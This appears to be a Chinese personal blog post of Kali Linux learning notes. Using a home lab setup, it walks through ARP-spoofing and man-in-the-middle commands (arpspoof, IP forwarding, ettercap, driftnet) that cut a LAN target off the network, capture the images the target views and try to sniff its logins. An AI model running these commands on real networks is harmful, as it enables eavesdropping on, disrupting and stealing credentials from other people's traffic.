一些学习网站

http://xiao106347.blog.163.com/blog/static/2159920782013111995945233/

http://xiao106347.blog.163.com/blog/static/21599207820146302851904/

http://xiao106347.blog.163.com/blog/static/215992078201352055231824/

下载系统:http://www.cnblogs.com/CyLee/p/5726521.html

终端输入armitage,然后一直确认即可

出现异常尝试如下几个步骤

1、命令行输入service postgresql start(或者/etc/init.d/postgresql start)

2、找到图形界面把metasploit framework打开,会自动创建数据库,自动连接(或者尝试msfdb start + msfconsole,反正我是没用)

3、再次使用armitage

arpspoof攻击局域网(虚拟机攻击本机)

注意,必须将虚拟机网络设置为【桥接模式】

arpspoof -i 【我的网卡】 -t 【攻击目标ip】 【攻击目标默认网关】

【我的网卡】:虚拟机中打开终端,输入ifconfig查看,通常都是eth0;

【攻击目标ip】:本机中打开终端,输入ifconfg查看,我的是192.168.1.101,我是通过打开【网络适配器】查看的

【攻击目标默认网关ip】:本机中打开终端,输入ifconfg查看,通常是192.168.1.1,我是通过打开【网络适配器->高级->tcp/ip】查看的

然后在虚拟机输入此demo:

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1

这样本机就无法访问网络了。按ctrl+c结束

获取局域网内攻击目标的图片

echo 1 >/proc/sys/net/ipv4/ip_forward      #默认是0,通过这行修改为1,这种方式叫【ip转发】此时不会有断网现象了

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1  #这种方式叫【arp欺骗】

ettercap -i eth0 -Tq -M arp:remote /192.168.1.103// /192.168.1.1//  #【arp欺骗】,如果上面的欺骗+截取没有效果,可以尝试使用这个

另开一个终端,使用如下命令截取图片流量。然后目标电脑打开任何带图片的网站如QQ空间

driftnet -i eth0  #浏览图片截取(本人MAC系统以及MAC系统上的虚拟机都无法使用该功能)

(ps:可以通过arp -a 来获取欺骗的成果,如果发现两个类型为【动态】的ip分别为目标和网关即可,mac电脑暂时无法看出是否被欺骗)

获取局域网内攻击目标的登录信息

也需要先arp欺骗+ip转发

ettercap -Tq -i eth0 #登录账号密码截取(暂时无法实现)

kail-linux 安全之旅的更多相关文章

  1. kail linux 虚拟机安装实录(一) 新建虚拟机

    各位晚上好. 现在开始进行kail linux 在虚拟机上的安装. 我所使用的工具如下: kail linux 2.0   x64  http://mirrors.neusoft.edu.cn/kal ...

  2. 【Linux探索之旅】第二部分第二课:命令行,世界尽在掌握

    内容简介 1.第二部分第二课:命令行,世界尽在掌握 2.第二部分第三课预告:文件和目录,组织不会亏待你 命令行,世界尽在掌握 今天的标题是不是有点霸气侧漏呢? 读者:“小编,你为什么每次都要起这么非主 ...

  3. 【Linux探索之旅】第一部分第五课:Unity桌面,人生若只如初见

    内容简介 1.第一部分第五课:Unity桌面,人生若只如初见 2.第一部分第六课预告:Linux如何安装在虚拟机中 Unity桌面,人生若只如初见 不容易啊,经过了前几课的学习,我们认识了Linux是 ...

  4. 【Linux探索之旅】第二部分第五课:用户和权限,有权就任性

    内容简单介绍 .第二部分第五课:用户和权限,有权就任性 2.第二部分第六课预告:Nano,刚開始学习的人的文本编辑器 用户和权限.有权就任性 今天的标题也挺任性的啊,虽说小编是一个非常本分的人(真的吗 ...

  5. Kail Linux的安装方法

    众所周知,kail 是一个基于Debian的Linux发行版,它的目标就是为了在一个实用的工具包里尽可能多的包含渗透和审计工具 kail就实现了这个目标,里面包含有很多关于安全测试的开源工具,如果现在 ...

  6. kail linux虚拟机安装tools工具

    因为自己比较懒,有时候自己不想打字需要粘贴就安装了虚拟机tools工具,又因为自己脑子不好使所以就写一下步骤,以便以后用得着.我这里用得是kail linux系统,不知道contest能不能这样安,下 ...

  7. 虚拟机14安装kail Linux

    需要准备虚拟机和kail Linux镜像 1. 2.选择镜像安装,并且添加你的kail Linux镜像文件. 3. 4.在这里需要修改虚拟机名称,也可以不修改就用默认,然后在修改kail Linux的 ...

  8. MOOC Linux内核之旅小结【转】

    转自:https://blog.csdn.net/titer1/article/details/45345123 版权声明:本文为博主原创文章,未经博主允许不得转载. https://blog.csd ...

  9. Linux内核之旅

    http://www.kerneltravel.net/ Linux内核之旅 Linux Kernel Travel

  10. kail linux 系统下利用metaspolit工具渗透win7电脑

     注:只是测试,不可干违法的事. 一.metaspolit工具的介绍 1.1.metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇 ...

随机推荐

  1. 如何利用phpize在生产环境中为php添加新的扩展php-bcmath

    在日常的开发当中,随着开发的功能越来越复杂.对运行环境的要求也就随着需求的变化需要不断地更新和变化.一个在线的生产系统不可能一开始就满足了所有的运行依赖,因此动态地添加依赖就显得比较必要了.如果你的应 ...

  2. 【回溯】n皇后问题

    问题 U: [回溯]n皇后问题 时间限制: 1 Sec  内存限制: 128 MB提交: 4  解决: 4[提交][状态][讨论版] 题目描述 在一个国际象棋棋盘上,放置n个皇后(n<10),使 ...

  3. ShortestPath:Six Degrees of Cowvin Bacon(POJ 2139)

    牛与电影 题目大意:就是一群牛,又在玩游戏了(怎么你们经常玩游戏),这个游戏规则如下,把牛拆分成一个一个组,并且定义一个“度”,规定在一个组的牛与他自己的度为0,与其他牛的度为1,不同组的牛不存在度, ...

  4. 纯css3 加载loading动画特效

    最近项目中要实现当页面还没有加载完给用户提示正在加载的loading,本来是想做个图片提示的,但是图片如果放大电脑的分辨率就会感觉到很虚,体验效果很不好.于是就采用css3+js实现这个loading ...

  5. Java性能优化权威指南-读书笔记(二)-JVM性能调优-概述

    概述:JVM性能调优没有一个非常固定的设置,比如堆大小设置多少,老年代设置多少.而是要根据实际的应用程序的系统需求,实际的活跃内存等确定.正文: JVM调优工作流程 整个调优过程是不断重复的一个迭代, ...

  6. 手机 无法转移到SD卡 Andriod 导出应用程序

    今天下载了一个应用Meridian,因为是直接从google商店里面装的,因此无法找到SDK,需要从新找到导出方式: 豌豆荚==> 软件和游戏管理==>输入Meridian搜素==> ...

  7. swift复合类型

     1.元组类型 (tuple) 元组就是多个元素的组合,是一个用圆括号括起来分号分隔的多个数据的一个集合体. 例如:定义一个学生变量,要求姓名 jim,年龄 19,性别 male 的元组变量为  // ...

  8. Linux Top

    http://www.it165.net/os/html/201402/7262.html

  9. Integer取值范围和NumberFormatException的解决

    项目有个查询当地新闻的接口,从GEO文件中取得code,后台查询. 下午测试的时候查询日本:3920000000,结果报java.lang.NumberFormatException,数字格式化异常, ...

  10. phpcms V9 改造:输出sql语句

    .修改数据库驱动 phpcms/libs/classes/mysql..修改模型 phpcms/libs/classes/model..调用 使用自定义模型类查询完成之后,调用模型类的lastsql( ...